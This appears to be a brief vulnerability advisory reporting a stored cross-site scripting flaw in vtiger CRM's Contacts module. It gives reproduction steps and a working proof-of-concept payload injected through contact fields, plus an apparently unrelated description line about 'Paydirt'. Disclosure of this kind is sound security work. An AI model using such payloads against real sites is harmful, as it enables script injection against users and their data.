# Affected software: vtiger.com
# Discovered by: Provensec
# Website: http://www.provensec.com
# Type of vulnerability: XSS Stored
# Description: Paydirt is currently integrated with Chrome and Firefox
1 Goto  site.vtiger.com/index.php?module=Contacts&view=List

2 add new contact fill fields with  xss payload "><img src=x
onerror=confirm(1);>

3 Then click on the added contact from the list and click see full
details